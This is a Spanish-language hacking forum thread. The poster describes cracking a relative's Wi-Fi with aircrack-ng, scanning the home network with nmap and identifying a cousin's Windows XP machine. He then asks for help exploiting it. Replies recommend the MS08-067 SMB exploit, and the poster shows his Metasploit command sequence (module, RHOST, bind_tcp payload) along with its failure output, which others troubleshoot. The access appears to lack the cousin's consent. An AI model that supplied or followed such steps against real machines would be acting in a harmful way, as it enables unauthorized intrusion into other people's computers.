elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ayuda Nmap y Metasploit
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Nmap y Metasploit  (Leído 28,996 veces)
xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Ayuda Nmap y Metasploit
« en: 3 Enero 2010, 18:19 pm »

Hola
Bien este es mi problema, hice una a puesta con mi tio de que le entraria a su ordenador y tener el control del sistema.Yo uso Linux

Lo primero que ice fue petarle el router con aircrack-ng para poder tener conexion a su red y asi poder entrarle, luego me conecto a traves de dhclient vale pos me conecto y dhclient me dice 1 cosa asi

DHCPACK of 192.168.1.34 from 192.168.1.1

yo entiendo esto decirme si me confundo 192.168.1.34 es mi ip y 192.168.1.1 la suya no?

Ok voy a nmap y ago esto

nmap 192.168.1.1/24

me sale esto mas o menos

PORT   STATE SERVICE
20/tcp open  ftp
23/tcp open  ssh
26/tcp open  telnet
83/tcp open  http
MAC Address: 00:2CXXXXXXXX

Ok y abajo otra cosa q es esto

Interesting ports on 192.168.1.32

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker
MAC Address: 00:16:XXXXXXXX <-------- otra mac creo q es mi primo q baja con el bittorrent y esta conectado ala red por wifi

Vale creo que ya e encontrado por donde entrar por bittorrent.
ok escaneo la ip  192.168.1.32 esta vez ago esto

nmap -O 192.168.1.32

Para saber q sistema usa on q ya lo sepa
Me pone q es windows xp SP2 O SP3

Ok hasta aki me e kedado que EXPLOIT LE TENGO Q LANZAR Y COMO CON METASPLOIT y si e hecho algo mal.

Gracias un saludo
En línea

Masita

Desconectado Desconectado

Mensajes: 120


pythoneando


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #1 en: 3 Enero 2010, 19:13 pm »

Bien lo primero: 192.168.1.1 es la puerta de enlace, para que nos entendamos es la ip del router. Sobre el ataque siendo esa version de windows primero tendrias que probar  a atacar el SMB. El foro esta plagado de post hablando sobre el asi que busca.

Deberias aprender por que funcionan las cosas y no solo como se hacen. Asi que almenos busca el exploit por que lo nombran en infinidad de post. Y no utilices mayusculas indiscriminadamente o te llamaran la atencion.
En línea

En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #2 en: 3 Enero 2010, 19:59 pm »

Si como te comentaron 192.168.1.1 es la puerta de enlace en este caso "el router".

En ese caso en nmap usa la opcion -A que de da informacion de la version del programa que escucha en esos puertos, apartide de ahi buscas vulnerabiliades en securityfocus

sobre el metasploit habria que ver si este tiene el exploit necesario para alguna vulnerabilidad.

Saludos
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #3 en: 3 Enero 2010, 19:59 pm »

Mira mis POST en las secciones de Hacking Avanzado y Hacking Basico. Tambien podes guiarte con mis videos.

http://www.youtube.com/user/alex19910218

Edit: Te recomiendo que uses el Scanner Nessus.  ;)

Saludos!
En línea

Te vendería mi talento por poder dormir tranquilo.
ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #4 en: 7 Enero 2010, 01:34 am »

intenta exploits para los bugs mas conocidos de windows como ms08-067.

usa metasploit
En línea

rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #5 en: 7 Enero 2010, 02:24 am »

el exploit es MSF se llama windows/smb/ms08_067_netapi
En línea




xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #6 en: 7 Enero 2010, 18:23 pm »

Hola

Use el exploit windows/smb/ms08_067_netapi pero cuando cargo el ataque con el commando exploit me dice error os digo los pasos que ago aver que ago mal:

use windows/smb/ms08_067_netapi

show options

set RHOST 192.168.1.32    <----------- es lo que me dio nmap de la vulnerabilidad de bittorrent

set PAYLOAD windows/shell/bind_tcp

show options

exploit         

y me dice esto
  • Started bind handler
  • [-] Exploit failed: The host (192.168.1.32:445) was unreachable.
  • Exploit completed, but no session was created.
no funciona donde esta el error.
Un saludo
En línea

Masita

Desconectado Desconectado

Mensajes: 120


pythoneando


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #7 en: 7 Enero 2010, 18:31 pm »

No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
En línea

En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #8 en: 7 Enero 2010, 18:36 pm »

No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.


cpu2 Mira.
   |   

Saludos!
En línea

Te vendería mi talento por poder dormir tranquilo.
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #9 en: 7 Enero 2010, 18:37 pm »

Citar
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.


NOOOOOOOO...

Citar
-] Exploit failed: The host (192.168.1.32:445) was unreachable.

en otras palabras, no tiene el puerto abierto..

intentas explotar una vulnerabilidad de samba en un puerto mal configurado de bittotrrent??
En línea




Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nmap, Nessus y Metasploit
Dudas Generales
El Gnomo 1 4,592 Último mensaje 10 Enero 2011, 01:27 am
por Shell Root
Nmap, Nessus y Metasploit
Hacking
El Gnomo 2 5,495 Último mensaje 13 Enero 2011, 23:26 pm
por El Gnomo
Ayuda urgente con los NSE de nmap-6.00
Hacking
D4rck4r 2 2,628 Último mensaje 11 Junio 2012, 02:59 am
por D4rck4r
¿Alguien me puede dejar algún manual de nmap y de metasploit?
Seguridad
robertito_prado 3 3,231 Último mensaje 23 Julio 2012, 03:33 am
por robertito_prado
Como agregar nmap 6.01 a el metasploit y armitage
Seguridad
D4rck4r 0 2,144 Último mensaje 10 Agosto 2012, 20:38 pm
por D4rck4r
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines